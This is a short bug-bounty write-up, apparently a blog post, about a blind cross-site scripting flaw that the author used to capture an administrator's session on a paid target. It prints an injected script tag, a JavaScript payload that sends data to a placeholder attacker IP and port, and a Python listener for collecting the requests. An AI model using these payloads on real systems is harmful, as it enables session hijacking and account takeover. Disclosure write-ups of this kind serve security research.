3000$ Blind Xss Hijack admin panel
Hi ๐
This idea is not limited only to the admin, it also applies to a place where XSS can be used, whether (reflected, imported, POST, or GET).
But the most dangerous idea is to be with an admin
We all know the danger of Xss, which is that the attacker steals the Cookie, and through the victimโs cookie, he enters the targetโs account (the admin or the user).
So we need to write a two-part code, the first to enter your server + to display the cookie session through the JavaScript code
1- First, create a file with the .js extension inside the server
alert(document.domain);
var i=new Image;
i.src="http://<ip>:<anyport>/?cookie="+document.domain;
2- Open a connection with any tool such as Netcat, so you can monitor the Apache HTTP Server log. I use a model inside Python 3 as follows: -
python3 -m http.server <port>
3- After opening a connection to the server, take the host with a link to the .js file
And call it with any js2 code, such as:
<script src="http://<ip>/xss.js"></script>
The Request will be delivered to you from the website with a cookie package, as shown in the picture
(In the real scenario of the attack, I injected the js code 2 into the request to verify my account and waited for about two hours. Once the admin accessed my request, the js code was activated and I received my cookie session inside http. sever log.
An hour after the Report, the vulnerability was fixed
Bounty : (3000$) with two other Bugs to the same company
We meet in the second security vulnerability of the same company